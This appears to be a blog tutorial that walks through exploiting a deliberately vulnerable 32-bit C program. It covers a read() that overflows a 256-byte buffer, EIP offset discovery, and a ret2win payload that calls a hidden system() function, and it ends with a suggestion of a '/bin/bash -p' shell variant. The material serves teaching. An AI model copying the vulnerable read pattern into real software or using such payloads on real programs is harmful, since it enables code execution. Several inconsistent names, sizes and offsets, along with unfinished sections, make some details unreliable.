> For the complete documentation index, see [llms.txt](https://archive.crow.rip/nest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://archive.crow.rip/nest/binexp/stack/xpl-bof.md).

# Buffer Overflows

<details>

<summary>Table of Contents</summary>

* [Foreward](#foreword)
* [Commence](#commence)
* [Insecure Example](#insecure-example)
* [Binary Disassembly](#binary-disassembly)
  * [The Main Function](#the-main-function)
  * [The Insecure Function](#the-insecure-function)
* [Stack Overflow](#stack-overflow)
* [Finding the EIP Offset](#finding-the-eip-offset)
* [Returning to Function](#returning-to-function)

</details>

## Foreword

<mark style="background-color:yellow;">I've created a video on the topic of stack-based buffer overflows, which you can find below</mark>. Personally, I find it much easier to watch it and follow along rather than reading the novella that this piece is. However, you can still get a ton of use from this blog regardless!&#x20;

{% embed url="<https://youtu.be/6sUd3AA7Q50>" %}
Buffer Overflows: A Symphony of Exploitation
{% endembed %}

## Introduction

Welcome to a highly saturated and already beat-to-death topic! Today, we’re exploiting a program via a buffer overflow attack. Except in this blog, rather than give you a step-by-step basic-ass way to exploit a binary, we'll do an extremely *deep* dive. From the compilation of the program to its eventual exploitation. So, without further ado, let’s jump right into it. First, let's consider the following source code:

{% code title="secure.c" %}

```c
// gcc -m32 -Wall -Wpedantic -g -o secure secure.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_SIZE 256

void secure(void) {
        char buffer[MAX_SIZE];
        printf("[>] hello, give me something to read!\n");
        int input = read(0, buffer, MAX_SIZE);
        printf("[+] user supplied %d-bytes!\n", input);
        printf("[+] buffer content: %s\n", buffer);
        return;
}

int main(void) {
        secure();
        return EXIT_SUCCESS;
}
```

{% endcode %}

<mark style="background-color:yellow;">This program is perfectly secure</mark>. We set up a buffer that’s `MAX_SIZE` wide, which we've defined to be `256`-bytes. When we take input from the user, we only allow `MAX_SIZE`-bytes to be read into that buffer. We couldn’t even overflow this if we tried (I mean, eventually, we would break the pipe given enough characters, but that’s not important right now). Let’s see what happens if we try to sneak in a couple thousand more bytes than what’s explicitly defined:

<figure><img src="/files/9YFdEpPasPwgjAqvzGZO" alt=""><figcaption><p>Output from the overflow attempt</p></figcaption></figure>

{% hint style="warning" %}
If you're trying to compile this program and you run into the following error:

```bash
In file included from /usr/include/features.h:535,
                 from /usr/include/bits/libc-header-start.h:33,
                 from /usr/include/stdio.h:28,
                 from secure.c:1:
/usr/include/gnu/stubs.h:7:11: fatal error: gnu/stubs-32.h: No such file or directory
    7 | # include <gnu/stubs-32.h>
      |           ^~~~~~~~~~~~~~~~
compilation terminated.
```

It's because you're missing the 32-bit "`libc-dev`" package. You can find the command to install this package for your distribution from [here](https://stackoverflow.com/a/7412698). In my case, I was also running into the following error:

```bash
insecure.c: In function ‘overflow_me’:
insecure.c:8:17: warning: ‘read’ writing 512 bytes into a region of size 256 overflows the destination [-Wstringop-overflow=]
    8 |     int input = read(0, buffer, 512); /* MAX_SIZE * 2 */
      |                 ^~~~~~~~~~~~~~~~~~~~
insecure.c:7:10: note: destination object ‘buffer’ of size 256
    7 |     char buffer[MAX_SIZE];
      |          ^~~~~~
In file included from insecure.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |                ^~~~
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: cannot find libgcc_s.so.1: No such file or directory
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/libgcc_s.so.1 when searching for libgcc_s.so.1
collect2: error: ld returned 1 exit status
```

Which I managed to fix by installing the "`lib32-gcc-libs`" and "`lib32-glibc`" packages on my Arch machine. However, please note that this *may* or may *not* work for you. It's still worth a try though! :man\_shrugging:

```bash
sudo pacman -S lib32-gcc-libs lib32-glibc
```

{% endhint %}

## Insecure Example

Now, let’s take a look at the following code:

{% code title="insecure.c" %}

```c
// gcc -m32 -Wall -Wpedantic -no-pie -fno-stack-protector -g -o insecure insecure.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_SIZE 256

void insecure(void) {
        char buffer[MAX_SIZE];
        printf("[>] hello, give me something to read!\n");
        int input = read(0, buffer, 512); // MAX_SIZE * 2
        printf("[+] user supplied %d-bytes!\n", input);
        printf("[+] buffer content: %s\n", buffer);
        return;
}

int main(void) {
        insecure();
        return EXIT_SUCCESS;
}
```

{% endcode %}

{% hint style="info" %}
The extra flags in the compilation command, such as: `-no-pie` and `-fno-stack-protector` are included to make our exploitation process easier. Without them, we'd have to deal with [stack canaries](/nest/binexp/sec/stack-canaries.md) and [PIE](/nest/binexp/sec/position-independent-executable-pie.md), which is *way* out of the scope of this blog post. Don't worry, we will circumnavigate these [protection mechanisms](/nest/binexp/sec.md) soon.
{% endhint %}

This is where stuff gets a bit… *bad*. The only difference between this code and the "`secure.c`" code is the following line:&#x20;

<pre class="language-c" data-title="insecure.c"><code class="lang-c">[...]
<strong>int input = read(0, buffer, 512); // MAX_SIZE * 2
</strong>[...]
</code></pre>

This time, the user can explicitly input *more* bytes than the buffer can hold. Recall that the buffer is set to `MAX_SIZE` (`256`-bytes); yet we're allowed to input `512`-bytes—literally *double* the amount that the buffer can handle. Luckily, when we try to compile this *horrendous* thing, we can see that the compiler screams at us—telling us that what we’re trying to compile is *ludicrously* insecure:

<figure><img src="/files/lxODc6H5alSv34AAUrLb" alt=""><figcaption><p>Compiler screams at us, but it still compiles our binary</p></figcaption></figure>

{% hint style="info" %}
Now, there is a way to actually combat this effectively, or at least, combat super simple buffer overflows and other bugs like this. That is, by using the "`-Werror`" flag in our compilation step. This flag tells our compiler to treat all warnings as errors and thus, will result in our binary not getting compiled at the slightest hint of a warning being encountered, as seen below:\
\
![](/files/nevhDYqzTgXeEy211Chi)

\
Now, this is effective, but is it *efficient*? I'm sure the point can be debated for either side, but let's leave that question up in the air for discussion :wink:
{% endhint %}

Now, if we try to supply more bytes than the buffer size, we can see that we get a segmentation fault (also known as a "`SIGSEGV`"):

<figure><img src="/files/jq622AfWr7fo58w21M3y" alt=""><figcaption><p>Segmentation fault achieved!</p></figcaption></figure>

For us, as exploit developers, this is fantastic. For users of this program or the developers, this is a nightmare. And we'll see why that is shortly. Just as a fun little experiment, I'll show you the same buffer overflow attempt shown above, except this time, I'll omit the "`-fno-stack-protector`" flag from the compilation command. This will show us why we must include it:

<figure><img src="/files/TEFX0SIxaITNhW3FIeue" alt=""><figcaption><p>Stack canary in action</p></figcaption></figure>

We no longer get a segmentation fault. Instead, the program exits immediately after our barrage attempt. The way this defence mechanism works will be covered in another post, specifically the "[stack canary](/nest/binexp/sec/stack-canaries.md)" post. However, a very crude and simplified explanation of this security mechanism and how it works is the following:

1. For every execution flow/branch in your program (like a function that will get called), there is a hardcoded "stack cookie" value placed into the accumulator register (`AX`), after the [function prologue](#user-content-fn-1)[^1].&#x20;
   1. If your program is compiled for 64-bit, the stack cookie gets placed into the `RAX` register, and it gets this value from the `GS` segment register at the offset of `0x28`.&#x20;
   2. If your program is compiled for 32-bit, the stack cookie gets placed into the `EAX` register, and it gets this value from the `FS` segment register at the offset of `0x14`.
2. The function will continue executing until it gets to the end, where there's a check to see if the stack cookie's value has been overwritten or not—which, if you're overwriting data as is expected with a buffer overflow attack, isn't all that unlikely.&#x20;
   1. If the stack cookie value is altered, then the `__stack_chk_fail` function will be executed immediately, and the program will print out a "`*** stack smashing detected ***`" message before exiting.
   2. Otherwise, the program will continue on as normal and keep on going until it naturally finishes or exits.

## Binary Disassembly

It is now time to open up our `insecure` binary in a disassembler/debugger. I'll be using [`pwndbg`](https://github.com/pwndbg/pwndbg). From the [installation section](https://github.com/pwndbg/pwndbg?tab=readme-ov-file#how) on the repository, installation is as straightforward as:

```bash
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
```

{% hint style="info" %}
Please note that there are many "flavours" of `gdb`, such as: `gef`, `pwndbg`, `peda`, etc. Further, there are more debuggers/disassemblers you can use, especially for the reverse engineering process, like Ghidra, Radare2, Cutter, IDA, Binary Ninja, etc. Don't limit yourself to one (`1`) tool and try to experiment a lot. Try to find a comfortable workflow that works for *you*.
{% endhint %}

<figure><img src="/files/7KN01OG60lSxcHNvr9qV" alt=""><figcaption><p>Opening our binary inside of <code>pwndbg</code></p></figcaption></figure>

Now that it’s open, we can examine the program’s innards. First, let’s start by finding all the functions present in this binary (this would be a lot harder if the binary was stripped but luckily for us, it’s not):

<figure><img src="/files/iAydav4fnizXxq6UYKWl" alt=""><figcaption><p>Functions in the binary</p></figcaption></figure>

{% hint style="info" %}
I apologize for the sudden change in appearance and directories. I continued this demonstration on a new Arch setup I've been tinkering with, and so, some things like the theme and working directory might be different. I'll also mention other things if&#x20;
{% endhint %}

### The Main Function

Thankfully, we can ignore *most* of the output above. The functions we’d like to focus on are the `main` and `insecure` functions. If we go inside of `main`, we’ll be able to see what the program does when it runs:

<figure><img src="/files/hsAMpS7qWyPVzcqOm5j7" alt=""><figcaption><p>Disassembly of <code>main</code></p></figcaption></figure>

If you’re having difficulty understanding this output, don't worry. Assembly can be *really* hard sometimes. However, take solace in the fact that this example is not as intimidating as it looks. We'll tackle this line-by-line. Let’s look at the source code so you can compare the disassembly to the pure source code:

```c
int main(int argc, char * argv[]){
      overflow();
      return 0;
}
```

{% hint style="info" %}
Note that in `x86_64`/`x86`, return values of functions are typically stored in `RAX`/`EAX`, respectively. From the disassembly above, we can see our return value (`0`) being placed in `EAX`; which directly corresponds to our "`return 0;`" line in the source code.
{% endhint %}

```nasm
Dump of assembler code for function main:
   0x08049070 <+0>:	push   ebp
   0x08049071 <+1>:	mov    ebp,esp
   0x08049073 <+3>:	and    esp,0xfffffff0
   0x08049076 <+6>:	call   0x80491a0 <insecure>
   0x0804907b <+11>:	xor    eax,eax
   0x0804907d <+13>:	leave
   0x0804907e <+14>:	ret
End of assembler dump.
```

#### Function Prologues & Epilogues

To better understand what we're about to talk about, it's important to cover some necessary background on how functions are set up and how they might alter the stack when we look at them in assembly.

> "In [assembly language](https://en.wikipedia.org/wiki/Assembly_language) [programming](https://en.wikipedia.org/wiki/Computer_programming), the function prologue is a few lines of code at the beginning of a function, which prepare the [stack](https://en.wikipedia.org/wiki/Call_stack) and [registers](https://en.wikipedia.org/wiki/Processor_register) for use within the function. Similarly, the function epilogue appears at the end of the function, and restores the stack and registers to the state they were in before the function was called."
>
> — [Wikipedia](https://en.wikipedia.org/wiki/Function_prologue_and_epilogue)

Remember, we're in super low-level territory now. We have to (or in this case, the compiler has to) manually set up *everything* to call a function, and I mean *everything*. Let's take the following code for example:

```c
#include <stdio.h>

int add(int a, int b) {
    int result = a + b;
    printf("%d + %d = %d\n", a, b, result);
    return result;
}

int main(void) {
    return add(4, 6);
}
```

For our CPU to invoke these functions, we need to setup the stack for them. This is usually done in three (3) steps or so:

1. Push the base pointer on the stack for restoration later (in the epilogue).
2.

### The Insecure Function

Let’s move on to something a bit more interesting. Now that we know (I mean we already knew since we compiled the damn program, but let’s pretend that we were [hacking blindly](#user-content-fn-2)[^2]) what’s inside of the `main` function, let’s disassemble the function that we found inside of it, "`overflow_me`":

<figure><img src="/files/w8DVSqqmmZqAyP4IBmF6" alt=""><figcaption><p>Disassembly of <code>overflow_me</code></p></figcaption></figure>

Before going any further, let’s bring back the source code of the `overflow_me` function and let's read the `man` pages for the `read` function so we can better make sense of the output:

{% code title="vulnerable.c" %}

```c
[...]

void overflow_me(void) {
    char buffer[MAX_SIZE];
    int input = read(0, buffer, 512); /* MAX_SIZE * 2 */
    printf("[+] user supplied %d-bytes!\n", input);
    printf("[+] buffer content: %s\n", buffer);
    return;
}

[...]
```

{% endcode %}

<figure><img src="/files/3RQSNPMB9kAINu2zHmui" alt=""><figcaption><p><code>read</code> <code>man</code> page</p></figcaption></figure>

We see that `read` has the following function syntax:

```c
ssize_t read(int fd, void buf[.count], size_t count);
```

On success, it returns a `ssize_t` (the number of bytes that have been read into the buffer), and on error, a `-1` is returned, which we can confirm in the "return value" section of the `man` pages:

```bash
RETURN VALUE
       On success, the number of bytes read is returned (zero indicates end of file), and the
       file position is advanced by this number. [...]

       On error, -1 is returned, and errno is set to indicate the error. In this case, it is
       left unspecified whether the file position (if any) changes.
       
[...]
```

The first parameter of this function is `fd` which is the "file descriptor" we wish to read from. There are three (`3`) file descriptors:

* Zero (`0`): Standard Input (`STDIN`)
* One (`1`): Standard Output (`STDOUT`)
* Two (`2`): Standard Error (`STDERR`)&#x20;

We're obviously submitting in bytes from the input, so we're going to be supplying zero (`0`)—standard input, as the argument. We can see this being pushed above our call to `read` in the disassembly here:

```bash
0x080491ad <+29>:	push   0x0 # fd = 0 (stdin)
```

If we examine the output of the disassembled function, we can see that the size of the buffer variable (which is  is pushed onto the stack *before* the call to the `read` function (`overflow_me <+19>`); that function is responsible for actually taking in our user input. This is done by moving the address of `[ebp-0xd4]` to the `EAX` register (`overflow_me <+17>`). After this, the buffer variable (now the `EAX` register) is pushed on the stack as an argument for that aforementioned `read` function. If we look carefully, we can see all of the arguments that are passed into `read` being pushed on the stack. Observe:

```c
  input = read(0, buffer, 400);
```

So, the first argument of the read function is a zero (`0`**)**. We can see this being pushed on the stack at:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>: 	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]
   0x0804918d <+23>:	push   eax
   0x0804918e <+24>:	push   0x0                     # read([0], buffer, 400)  
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

Next, we see the buffer variable being passed into the function, which we already just covered:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>:	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]            
   0x0804918d <+23>:	push   eax                     # read(0, [buffer], 400)
   0x0804918e <+24>:	push   0x0
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

Lastly, we have the 400 bytes we’re allowed to input into the buffer variable:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>:	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190                   # read(0, buffer, [400])
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]            
   0x0804918d <+23>:	push   eax           ****          
   0x0804918e <+24>:	push   0x0
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

How is that the 400? Well, the thing being pushed (`0x190`) is hexadecimal for `400`. We can verify this with:

```bash
gdb-peda$ print /d 0x190 # /d to print out a decimal
$1 = 400
```

Thus, we have reverse-engineered all the arguments to the `read` function! Pretty fascinating stuff, right 😄?&#x20;

## Stack Overflow

Let’s get even *more* in-depth and interact with the program. First, let’s create a text file to hold all of our A’s:

```bash
bin_0x01 ›› python -c 'print("A" * 600)' > input.txt
```

I chose 600 bytes arbitrarily, you can choose whatever. Now, let’s run the program; supplying our input, of course:

{% hint style="warning" %}
Although the bytes I supplied are arbitrary, you should still be mindful of how much you initially supply, it's better to start small and iterate higher and higher.
{% endhint %}

```bash
gdb-peda$ r < input.txt
```

<figure><img src="/files/DeojNTqZh8OQXrUooMLQ" alt=""><figcaption><p>Segmentation fault </p></figcaption></figure>

As expected, we’ve got a segmentation fault. Since this is going to be more in-depth than just a simple “do this after crashing the program” kind of article, let’s examine what happens to the program before it dies as a form of cyber-pseudo-still living autopsy. <mark style="background-color:orange;">To do this, some extremely useful features called “breakpoints” are going to be used. A stop, halt, or “break” of the program's execution is done when the program reaches a breakpoint</mark>. So, let’s set some breakpoints before the call to `read`, one right after it, and lastly, one on the return (`ret`) instruction.

<figure><img src="/files/204qmufAce8Zi5VJtIC2" alt=""><figcaption><p>Setting breakpoints</p></figcaption></figure>

Now, if we run the program, it should hit the first breakpoint right before the call to the read function.

```bash
gdb-peda$ r
```

<figure><img src="/files/QmmGEYgUcG0F6Nyionnj" alt=""><figcaption><p>First breakpoint hit</p></figcaption></figure>

We can see from the code section that we’re currently inside the overflow function. We can see this further by examining a couple of addresses at the `EIP` register:

<figure><img src="/files/Z2ZylNjWfzk2Yp5OzNEX" alt=""><figcaption><p>Examining the <code>EIP</code> register</p></figcaption></figure>

Nice, this looks like the overflow function and if we recall, our input will be stored inside of the buffer variable which is located at the address of `[ebp-0xd4]`. We can find the address of this region with the following command:

```c
gdb-peda$ p $ebp-0x200
$1 = (void *) 0xffffd028
```

If we view this address, we won’t find our “A”s in there yet because remember, we’re at the breakpoint right before the program will take our input and toss it into the region we’re going to be examining (the buffer):

<figure><img src="/files/QbOGm6go9Deqrpf9SOKs" alt=""><figcaption><p>Examining the memory region for <code>$ebp-0x200</code> (<code>0xffffd028</code>)</p></figcaption></figure>

If we continue the execution of the program using `c`, we can then re-examine this block of memory and we should see our A’s in there!

```bash
gdb-peda$ c
```

<figure><img src="/files/vjms0D5HtQonZzRCyUaT" alt=""><figcaption><p>Second breakpoint hit</p></figcaption></figure>

We’re at the second breakpoint now, i.e., right after the call to `read`. Which means…

<figure><img src="/files/IMWcHPUu3YJYtVCYg7tw" alt=""><figcaption><p>Memory region filled with A's</p></figcaption></figure>

Nice! We can see that A’s are all up in here. The next thing we need to take a look at is why the program crashes.

{% hint style="info" %}
Since our output is larger than the declared variable size, the A’s obviously need to go *somewhere*. The normal behaviour of a program is that the A’s are copied further down the stack—overwriting/overflowing other crucial data that was meant to reside there originally. <mark style="background-color:orange;">One critical piece of data that was overwritten was the "</mark>*<mark style="background-color:orange;">return address</mark>*<mark style="background-color:orange;">."</mark>
{% endhint %}

Once the `overflow` function is complete, the return address that was pushed onto the stack was meant to restore the rest of the `main` function. However, if we hit continue again, we hit the last breakpoint set at the return instruction.

{% hint style="info" %}
The return instruction takes the data at the top of the stack and puts it into the `EIP`.
{% endhint %}

The stack pointer (`ESP`) holds the top of the stack. So, once we get to our last breakpoint, we can see:

<figure><img src="/files/43ia7t9UYln0HS5DOTui" alt=""><figcaption><p>3rd breakpoint hit, on the ret instruction</p></figcaption></figure>

We’re at the `RET` instruction and since we’re at `RET`, what’s going to happen here is that the `ESP` register is going to move whatever value is inside of it (i.e., at the top of the stack—normally, this would just be the normal return so that we could restore `main`) into the `EIP` register and since it’s going to be a bunch of A’s, it’s going to crash. Let’s step inside the debugger and see if we can catch the moment the `EIP` gets filled with the value inside of `ESP` due to the `RET` instruction:

```c
step
```

<figure><img src="/files/OZ4AtGCTbuZjG7p6hdSc" alt=""><figcaption><p>EIP register overwritten with A's</p></figcaption></figure>

It’s just like we thought, the **`ESP`** (although it once held a normal and perfectly usable address) took the value inside of it and put it in the **`EIP`** register. Since our overflow had reached way down the stack, the **`ESP`** register took what was on top of the stack; a bunch of A’s, and put that in the `EIP` register instead, and the **`EIP`** register told the program to run the instruction at `0x41414141`—which, as we all know, isn’t a proper memory address, so we’ve crashed.

<figure><img src="/files/GZ6g5ngp8O61wbqUKpxO" alt=""><figcaption><p>Stack overwritten with A's</p></figcaption></figure>

## Finding the EIP Offset

The even more dangerous part now is that we can very obviously overflow the stack to the point that after the **`RET`** instruction is reached, it makes the **`ESP`** register move a completely useless address to the **`EIP`** register. But what if we overflow the program just before we overwrite the return address and instead change the return address, not to a bunch of A’s, but instead, to some actually useful code, like for instance, some code that we put on the stack. In order to do that, we need to first figure out the offset until we reach the **`EIP`**. We need to generate a pattern:

```bash
gdb-peda$ pattern create 600 pattern.txt
Writing pattern of 600 chars to filename "pattern.txt"
```

Now, let’s run the program using the newly created pattern as our input:

<figure><img src="/files/93QBRwkLTKdelH4Nm72K" alt=""><figcaption><p>Running with pattern as input</p></figcaption></figure>

It might be hard to see, but the value stored inside of the **`EIP`** register is: **`0x4325416e`**. Since we have this address now, we can find the offset using the following command:

```c
gdb-peda$ pattern offset 0x4325416e
1126515054 found at offset: 216
```

Okay, perfect. We know that the **`EIP`** can be supplied up to 216 bytes before we overwrite it and destroy it. So, let’s see if we can overwrite the **`EIP`** address with a bunch of B’s:

```python
bin_0x01 ›› python -c 'print("A" * 216 + "B" * 4 + "C" * 180)' > offset.txt
```

ourselvesIt’s good to use the same amount of bytes as you started with and fill the unused bytes with a different character just to make good use of the space and to better see ourselves on the stack. Let’s run this and if we’ve overwritten values properly, we should see that our `EIP` register holds a value of **`42424242`** (B’s in hex):

<figure><img src="/files/U0ISM4nSrFix2aGXvPW1" alt=""><figcaption><p>EIP register written with B's</p></figcaption></figure>

## Returning to Function

Perfect! Now, all we need to do is supply our own shellcode to abuse this or find a function that’s stupidly overpowered to hack the program for us. Let’s examine a case where we could populate the **`EIP`** with the address of a function left inside of the program to hack it for us. First, let’s edit our source code:

{% code title="vulnerable\_II.c" %}

```c
#include <stdio.h>
#include <unistd.h>

int hackme(){
  system("touch hacked.txt")
}

int secure(){
  char buffer[200];
  int input;
  input = read(0, buffer, 400);
  printf("\n[+] user supplied: %d-bytes!", input);
  printf("\n[+] buffer content --> %s!", buffer);
  return 0;
}

int main(int argc, char * argv[]){
  secure();
  return 0;
}
```

{% endcode %}

The only difference between this program and the previous one is the inclusion of the **`hackme()`** function which will create a file called **`hacked.txt`**. Now, it won’t ever get the chance to actually run that function since inside of **`main()`**, we never call the function - so this is just dead code inside of the program. Let’s compile this:

{% code overflow="wrap" %}

```bash
bin_0x01 ›› gcc -m32 -no-pie -fno-pie -mno-accumulate-outgoing-args -fno-stack-protector -z execstack vulnerable_II.c -o vulnerable_II
```

{% endcode %}

<figure><img src="/files/UdAqr1uNAZ9RG8fe2HcJ" alt=""><figcaption><p>Compilation of vulnerable_II.c</p></figcaption></figure>

Nice. If we open this new binary inside of a debugger and list the functions now, we should see the function that we’ve included:

<figure><img src="/files/padvTlSb39R5eFcIVr1S" alt=""><figcaption><p>Listing functions of the binary, our vulnerable function is listed there</p></figcaption></figure>

Et voila! It’s here. Now, remember, this program is NEVER called during runtime. You’re not going to find this function inside of main. The only thing you’ll find is the **`overflow()`** function:

```c
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080491e5 <+0>:	push   ebp
   0x080491e6 <+1>:	mov    ebp,esp
   0x080491e8 <+3>:	and    esp,0xfffffff0
   0x080491eb <+6>:	call   0x804918f <overflow>
   0x080491f0 <+11>:	mov    eax,0x0
   0x080491f5 <+16>:	leave
   0x080491f6 <+17>:	ret
End of assembler dump.
gdb-peda$
```

{% hint style="info" %}
This is where it gets super interesting! Pay attention!
{% endhint %}

So, we can crash the program, crash the program just enough to supply the instruction pointer with a bunch of B’s, but what else can we do - and more importantly, how much more malicious can we get? Well, friends, allow me to introduce the concept of **`EIP`** control - or execution control. So, the **`EIP`** register, what does it do? Basically, the instruction pointer can be summarized in the following:

> The Program Counter, also known as the Instruction pointer, is a processor register that indicates the current address of the program being executed. \
> — [Program Counter, Embedded Artistry](https://embeddedartistry.com/fieldmanual-terms/program-counter/)

So if you could imagine, when we filled the **`EIP`** register of the four B’s, those were just junk bytes. **`0x42424242`** doesn’t mean anything in the context of a usable memory address. However, *<mark style="background-color:orange;">what if instead of supplying B’s or any other letter, we supplied the address of a function - specifically, the function that wouldn’t otherwise get executed 😉</mark>*. Therein lies the beauty of this technique. We get to use our program *against itself*. First, let’s go ahead and disassemble the function we added:

<figure><img src="/files/ySLYeGvGAJRd8WoAQk7j" alt=""><figcaption><p>Disassembly of hackme()</p></figcaption></figure>

In this output, we can clearly see that inside the **`hackme()`** function, there’s a call to **`system()`** with a push of an address right above it. That address being pushed, is going to be the argument passed to system. In this case, it’s going to create a text file called **`hacked.txt`**. Let’s see if that’s the value of the argument by examining that address as a string:

```c
gdb-peda$ x/s 0x804a008
0x804a008:	"touch hackme.txt"
```

It’s just as we thought! Perfect. Now, let’s move on and actually exploit this program such that we overflow the binary, redirect the **`EIP`** to hold the address of the **`hackme()`** function - the culmination of which will create a text file in our directory. So, let’s start off by getting the address of this function:

```c
gdb-peda$ p hackme
$1 = {<text variable, no debug info>} 0x8049176 <hackme>
```

Remember that this binary is in little-endian. This means that we can’t just supply the address above as is, we need to reverse the byte order which means instead of **`0x8049176`**, the address is going to be:

```c
"\x76\x91\x04\x08"
```

See how much more useful this is when we compare it to our “BBBB” inside of the **`EIP`** register? Now, when the **`EIP`** gets this value, it’ll run the **`hackme()`** function; instead of crashing because it doesn’t know what to do with **`0x42424242`**. Let’s replace our payloads:

```python
bin_0x01 ›› python -c 'print("A" * 216 + "B" * 4 + "C" * 180)' > offset.txt
```

This turns into:

{% code overflow="wrap" %}

```bash
bin_0x01 ›› python2 -c 'print("A" * 216 + "\x76\x91\x04\x08" + "C" * 180)' > exploit.txt
```

{% endcode %}

{% hint style="info" %}
The reason I used **`python2`** for this command is because of [this](https://stackoverflow.com/questions/43477337/how-to-fix-gdb-probable-charset-issue-nop-0x90-translating-to-0x90c2-in-memory).
{% endhint %}

Now, if we finally run this exploit input, we should see that the exploit forces the binary to run that **`hackme()`** function and thus, a file will be created. First, let’s list our current directory:

<figure><img src="/files/5gGHRyaZ9ykyfVAKKb7c" alt=""><figcaption><p>Listing current directory</p></figcaption></figure>

See, there’s no **`hacked.txt`** file. Now, let’s open the program up inside of GDB and run the exploit:

```bash
gdb-peda$ r < exploit.txt
```

<figure><img src="/files/6C4ghFEMAXfTr7BSahgM" alt=""><figcaption><p>Running our exploit</p></figcaption></figure>

Awesome, we can see new processes/programs were spawned which should’ve created our file:

<figure><img src="/files/1KJ0R5THkOVXpcyGk7Fq" alt=""><figcaption><p>File gets created</p></figcaption></figure>

And there we have it! The file was created! Now, obviously, creating a file is not that special but could you imagine the devastation if instead of:

```c
int hackme(){
    system("touch hacked.txt");
}
```

There was a function like:

```c
int uh_oh(){
    system("/bin/bash -p");
}
```

Yeah… That wouldn’t be good. And there’s a nice little trick we can use (called the double-cat trick due to `STDIN` being open in a weird way but that’s a talk for a different time) to keep the shell open because if we were to redirect the **`EIP`** to that **`uh_oh()`** function, it wouldn’t be stable enough for us to use the shell. I hope you’ll excuse me for blabbering on and nerd-ing out, but you can see how cool this is. From the basic reverse engineering to delving down deep and hacking this program, I hope you learned/got something from this and I sincerely thank you for reading this post!

{% hint style="success" %}
Until next time! 😄
{% endhint %}

## Capstone Challenge

[^1]: We're just about to cover function prologues and epilogues in a bit. Don't worry if you don't understand what this means yet. Keep on reading and then come back to this if you'd like. It should make more sense then!

[^2]: This is also known as a "black-box" approach.


---

# Agent Instructions
